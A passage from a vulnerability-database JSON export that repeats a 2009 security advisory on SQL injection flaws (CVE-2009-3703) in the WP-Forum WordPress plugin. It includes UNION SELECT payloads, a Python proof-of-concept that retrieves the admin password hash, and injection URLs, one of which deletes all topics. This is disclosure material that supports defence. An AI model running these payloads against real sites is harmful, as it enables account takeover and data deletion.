database.\r\nThis flaw could result in get access to WordPress accounts including\r\nthe administrator one.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nWP-Forum <= 2.3 are vulnerable.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nUpdate to version 2.4.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\r\nhttp://www.wordpress.org/\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 28, 2009: Initial release.\r\nOctober 13, 2009: Review.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 15, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nSeptember 28, 2009: Vulnerability discovered\r\n by Internet Security Auditors.\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. Response about its correction.\r\nDecember 14, 2009: New version published.\r\nDecember 15, 2009: Advisory released to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15104", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:20:47", "description": "BUGTRAQ ID: 37357\r\nCVE ID: CVE-2009-3703\r\n\r\nWP-Forum\u662f\u4e00\u6b3e\u57fa\u4e8ePHP\u7684WordPress\u63d2\u4ef6\u3002\r\n\r\nWP-Forum\u7684wpf.class.php\u9875\u9762\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u7528\u6237\u6240\u63d0\u4ea4\u7684forum\u3001topic\u548csearch_max\u53c2\u6570\uff0c\u4ee5\u53ca\u5728 editpost\u6216viewtopic\u64cd\u4f5c\u4e2d\u6240\u63d0\u4ea4\u7684id\u53c2\u6570\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884cSQL\u6ce8\u5165\u653b\u51fb\u3002\u4ee5\u4e0b\u662f\u6709\u6f0f\u6d1e\u7684\u4ee3\u7801\u6bb5\uff1a\r\n\r\nwpf.class\u6587\u4ef6\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this line is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) ";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.","; // <- <- this lines is not being sanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = "";\r\n1856 else\r\n1857 $w = "IN($a)";\r\n1858\r\n1859 $sql = "SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op";\r\n\r\n\u5728wpf-post.php\u6587\u4ef6\u4e2d\uff1a\r\n\r\n57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n58 $thread = $this->check_parms($_GET['t']);\r\n59\r\n60 $out .= $this->header();\r\n61\r\n62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id"); // <- id is used without clean up\r\n\r\n\u5176\u4ed6\u793a\u4f8b\uff1a\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var("SELECT author_id from\r\n$this->t_posts where id = $id"); // id is used without clean up\r\n...\r\n1503 if($del == "ok"){\r\n1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id\r\n= $id"); <- // id is used without clean up\r\n1505 $this->o .= "<div class='updated'>".__("Post\r\ndeleted", "wpforum")."</div>";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__("Cheating, are we?", "wpforum"));\r\n1509\r\n1510 }\r\n\r\n\u6b64\u5916\u7531\u4e8e\u6ca1\u6709\u6b63\u786e\u7684\u8fc7\u6ee4$_GET['topic']\uff0c\u8fd8\u53ef\u4ee5\u6e05\u9664$this->t_posts\u548c$this->t_threads\u8868\u683c\u4e2d\u7684\u6240\u6709\u8bb0\u5f55\uff1a\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query("DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic");\r\n1484 $wpdb->query("DELETE FROM $this->t_threads WHERE\r\nid = $topic");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__("Cheating, are we?", "wpforum"));\r\n1488\r\n1489 }\n\nFredrik Fahlstad WP-Forum <= 2.3\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nFredrik Fahlstad\r\n----------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/", "published": "2009-12-23T00:00:00", "type": "seebug", "title": "WordPress WP-Forum\u63d2\u4ef6\u591a\u4e2aSQL\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2009-12-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15131", "id": "SSV:15131", "sourceData": "\n http://www.example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=0&amp;t=.0\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=1&amp;t=.0\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=0\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=1\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=0\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=1\r\nhttp://www.example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=1.0&amp;delete_topic&amp;topic=5%20or%201=1\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15131", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:25:21", "description": "No description provided by source.", "published": "2009-12-16T00:00:00", "type": "seebug", "title": "WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2009-12-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18553", "id": "SSV:18553", "sourceData": "\n =============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-010\r\n- Original release date: September 28th, 2009\r\n- Last revised: December 15th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3703\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWP-Forum is a discussion forum plugin for WordPress. It works with\r\nWordPress 2+ version and PHP >= 5.0\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nWP-Forum fails to sanitized user supplied input and is vulnerable to\r\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\r\nof the database including user logins and password's of the WordPress\r\ninstallation, allowing him to obtain access to the application and\r\ngain administration privileges.\r\n\r\nFor the SQL Injection vulnerability, is possible to concatenate other\r\nsql requests via "union select" sentence. The parameters "search_max"\r\nand "forum" are affected by this flaw.\r\n\r\nSnippet of vulnerable code:\r\n\r\nIn wpf.class file:\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this\r\nline is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) ";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.","; // <- <- this lines is not being\r\nsanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = "";\r\n1856 else\r\n1857 $w = "IN($a)";\r\n1858\r\n1859 $sql = "SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op";\r\n\r\nIn the case of the Blind SQL Injection, the vulnerable code is...\r\n\r\nIn wpf-post.php file:\r\n\r\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n 58 $thread = $this->check_parms($_GET['t']);\r\n 59\r\n 60 $out .= $this->header();\r\n 61\r\n 62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id"); // <- id is used without clean up\r\n\r\nother example:\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var("SELECT author_id from\r\n$this->t_posts where id = $id"); // id is used without clean up\r\n...\r\n1503 if($del == "ok"){\r\n1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id\r\n= $id"); <- // id is used without clean up\r\n1505 $this->o .= "<div class='updated'>".__("Post\r\ndeleted", "wpforum")."</div>";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__("Cheating, are we?", "wpforum"));\r\n1509\r\n1510 }\r\n\r\nthe "id" parameter is vulnerable in other parts of the source code..\r\n\r\nAlso, is possible to delete all records in table $this->t_posts and\r\n$this->t_threads because $_GET['topic'] is not properly sanitized,\r\ninjecting something like 1 or 1=1\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query("DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic");\r\n1484 $wpdb->query("DELETE FROM $this->t_threads WHERE\r\nid = $topic");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__("Cheating, are we?", "wpforum"));\r\n1488\r\n1489 }\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\r\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\r\nin each case\r\n\r\nIs possible to obtain any data of the database. Here is a proof of\r\nconcept to obtain user_pass, user_login and user_email of the user\r\nwith id=1 of wp_users table (normally admin).\r\n\r\nWe have to fill the search_max parameter with the value:\r\n\r\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n\r\nI wrote a PoC, to get automatically the password hash of the WordPress\r\nadmin account:\r\n\r\nuser () linuz:~$ cat wpforum2.3-poc.py\r\n#!/usr/bin/python\r\n\r\n# WP-Forum <= 2.3 SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Internet Security Auditors\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\n\r\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\r\nvalues = {'search_words' : 'any',\r\n 'search_submit' : 'Search',\r\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\r\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\r\n\r\ndata = urllib.urlencode(values)\r\nreq = urllib2.Request(url, data)\r\nresponse = urllib2.urlopen(req)\r\noutput = response.read()\r\no = re.search('viewtopic.+>([$].+)<',output)\r\nif o:\r\n print o.group(1)\r\n\r\nuser () linuz:~$ python wpforum2.3-poc.py\r\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\r\nuser () linuz:~$\r\n\r\nThat's it!\r\n\r\nFor the blind sql injection, here are some examples:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\r\n\r\nIs possible to delete all topics, injecting sql code in "topic" parameter:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can obtain or delete any data of the database.\r\nThis flaw could result in get access to WordPress accounts including\r\nthe administrator one.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nWP-Forum <= 2.3 are vulnerable.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nUpdate to version 2.4.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\r\nhttp://www.wordpress.org/\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 28, 2009: Initial release.\r\nOctober 13, 2009: Review.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 15, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nSeptember 28, 2009: Vulnerability discovered\r\n by Internet Security Auditors.\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. Response about its correction.\r\nDecember 14, 2009: New version published.\r\nDecember 15, 2009: Advisory released to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18553", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3703"], "description": "=============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-010\r\n- Original release date: September 28th, 2009\r\n- Last revised: December 15th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3703\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWP-Forum is a discussion forum plugin for WordPress. It works with\r\nWordPress 2+ version and PHP >= 5.0\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nWP-Forum fails to sanitized user supplied input and is vulnerable to\r\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\r\nof the database including user logins and password's of the WordPress\r\ninstallation, allowing him to obtain access to the application and\r\ngain administration privileges.\r\n\r\nFor the SQL Injection vulnerability, is possible to concatenate other\r\nsql requests via "union select" sentence. The parameters "search_max"\r\nand "forum" are affected by this flaw.\r\n\r\nSnippet of vulnerable code:\r\n\r\nIn wpf.class file:\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this\r\nline is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) ";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.","; // <- <- this lines is not being\r\nsanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = "";\r\n1856 else\r\n1857 $w = "IN($a)";\r\n1858\r\n1859 $sql = "SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op";\r\n\r\nIn the case of the Blind SQL Injection, the vulnerable code is...\r\n\r\nIn wpf-post.php file:\r\n\r\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n 58 $thread = $this->check_parms($_GET['t']);\r\n 59\r\n 60 $out .= $this->header();\r\n 61\r\n 62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id"); // <- id is used without clean up\r\n\r\nother example:\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var("SELECT author_id from\r\n$this->t_posts where id = $id"); // id is used without clean up\r\n...\r\n1503 if($del == "ok"){\r\n1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id\r\n= $id"); <- // id is used without clean up\r\n1505 $this->o .= "<div class='updated'>".__("Post\r\ndeleted", "wpforum")."</div>";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__("Cheating, are we?", "wpforum"));\r\n1509\r\n1510 }\r\n\r\nthe "id" parameter is vulnerable in other parts of the source code..\r\n\r\nAlso, is possible to delete all records in table $this->t_posts and\r\n$this->t_threads because $_GET['topic'] is not properly sanitized,\r\ninjecting something like 1 or 1=1\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query("DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic");\r\n1484 $wpdb->query("DELETE FROM $this->t_threads WHERE\r\nid = $topic");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__("Cheating, are we?", "wpforum"));\r\n1488\r\n1489 }\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\r\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\r\nin each case\r\n\r\nIs possible to obtain any data of the database. Here is a proof of\r\nconcept to obtain user_pass, user_login and user_email of the user\r\nwith id=1 of wp_users table (normally admin).\r\n\r\nWe have to fill the search_max parameter with the value:\r\n\r\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n\r\nI wrote a PoC, to get automatically the password hash of the WordPress\r\nadmin account:\r\n\r\nuser@linuz:~$ cat wpforum2.3-poc.py\r\n#!/usr/bin/python\r\n\r\n# WP-Forum <= 2.3 SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Internet Security Auditors\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\n\r\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\r\nvalues = {'search_words' : 'any',\r\n 'search_submit' : 'Search',\r\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\r\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\r\n\r\ndata = urllib.urlencode(values)\r\nreq = urllib2.Request(url, data)\r\nresponse = urllib2.urlopen(req)\r\noutput = response.read()\r\no = re.search('viewtopic.+>([$].+)<',output)\r\nif o:\r\n print o.group(1)\r\n\r\nuser@linuz:~$ python wpforum2.3-poc.py\r\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\r\nuser@linuz:~$\r\n\r\nThat's it!\r\n\r\nFor the blind sql injection, here are some examples:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\r\n\r\nIs possible to delete all topics, injecting sql code in "topic" parameter:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can obtain or delete any data of the database.\r\nThis flaw could result in get access to WordPress accounts including\r\nthe administrator one.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nWP-Forum <= 2.3 are vulnerable.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nUpdate to version 2.4.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\r\nhttp://www.wordpress.org/\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 28, 2009: Initial release.\r\nOctober 13, 2009: Review.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 15, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nSeptember 28, 2009: Vulnerability discovered\r\n by Internet Security Auditors.\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. Response about its correction.\r\nDecember 14, 2009: New version published.\r\nDecember 15, 2009: Advisory released to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.", "edition": 1, "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:DOC:22950", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22950", "title": "[ISecAuditors Security Advisories] WP-Forum <= 2.3 SQL Injection vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:55:55", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2009-12-16T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3703", "CVE-2009-4112"], "modified": "2009-12-16T00:00:00", "id": "SECURITYVULNS:VULN:10477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10477", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "software", "cvelist": ["CVE-2009-3703"], "description": "The wp-forum WordPress plugin was affected by a Multiple SQL Injection security vulnerability.\n", "modified": "2019-11-28T05:06:29", "published": "2009-09-28T00:00:00", "id": "WPVDB-ID:AA5D0ABB-7239-4A9B-B684-9B1ECE51CCF9", "href": "https://wpscan.com/vulnerability/aa5d0abb-7239-4a9b-b684-9b1ece51ccf9", "type": "wpvulndb", "title": "WP Forum < 2.4 - Multiple SQL Injection", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:18", "description": "", "published": "2009-12-16T00:00:00", "type": "packetstorm", "title": "WP-Forum 2.3 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2009-12-16T00:00:00", "id": "PACKETSTORM:83915", "href": "https://packetstormsecurity.com/files/83915/WP-Forum-2.3-SQL-Injection.html", "sourceData": "`============================================= \nINTERNET SECURITY AUDITORS ALERT 2009-010 \n- Original release date: September 28th, 2009 \n- Last revised: December 15th, 2009 \n- Discovered by: Juan Galiana Lara \n- CVE ID: CVE-2009-3703 \n- Severity: 8.5/10 (CVSS Base Score) \n============================================= \n \nI. VULNERABILITY \n------------------------- \nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities \n \nII. BACKGROUND \n------------------------- \nWP-Forum is a discussion forum plugin for WordPress. It works with \nWordPress 2+ version and PHP >= 5.0 \n \nIII. DESCRIPTION \n------------------------- \nWP-Forum fails to sanitized user supplied input and is vulnerable to \nSQL Injection and Blind SQL Injection. An attacker can obtain any data \nof the database including user logins and password's of the WordPress \ninstallation, allowing him to obtain access to the application and \ngain administration privileges. \n \nFor the SQL Injection vulnerability, is possible to concatenate other \nsql requests via \"union select\" sentence. The parameters \"search_max\" \nand \"forum\" are affected by this flaw. \n \nSnippet of vulnerable code: \n \nIn wpf.class file: \n \n1836 $option_max_days = $_POST['search_max']; // <- this \nline is not being sanitized \n1837 $option_forums = $_POST['forum']; \n1838 if(!$option_max_days) \n1839 $option_max_days = 9999; \n1840 $op .= \" AND $this->t_posts.`date` > SUBDATE(CURDATE(), \nINTERVAL $option_max_days DAY) \"; \n1841 \n... \n1850 foreach((array)$option_forums as $f) \n1851 $a .= $f.\",\"; // <- <- this lines is not being \nsanitized \n1852 \n1853 $a = substr($a, 0, strlen($a)-1 ); \n1854 if(!$a) \n1855 $w = \"\"; \n1856 else \n1857 $w = \"IN($a)\"; \n1858 \n1859 $sql = \"SELECT $this->t_threads.parent_id as pt, \n$this->t_posts.id, text, $this->t_posts.subject, \n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST \n('$search_string') AS score \n1860 FROM $this->t_posts inner join $this->t_threads on \n$this->t_posts.parent_id = $this->t_threads.id \n1861 WHERE $this->t_threads.parent_id $w \n1862 AND MATCH (text) AGAINST ('$search_string') $op\"; \n \nIn the case of the Blind SQL Injection, the vulnerable code is... \n \nIn wpf-post.php file: \n \n57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned \n58 $thread = $this->check_parms($_GET['t']); \n59 \n60 $out .= $this->header(); \n61 \n62 $post = $wpdb->get_row(\"SELECT * FROM $wpforum->t_posts WHERE \nid = $id\"); // <- id is used without clean up \n \nother example: \n \n1490 function remove_post(){ \n1491 global $user_level, $user_ID, $wpdb; \n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned \n1493 $author = $wpdb->get_var(\"SELECT author_id from \n$this->t_posts where id = $id\"); // id is used without clean up \n... \n1503 if($del == \"ok\"){ \n1504 $wpdb->query(\"DELETE FROM $this->t_posts WHERE id \n= $id\"); <- // id is used without clean up \n1505 $this->o .= \"<div class='updated'>\".__(\"Post \ndeleted\", \"wpforum\").\"</div>\"; \n1506 } \n1507 else \n1508 wp_die(__(\"Cheating, are we?\", \"wpforum\")); \n1509 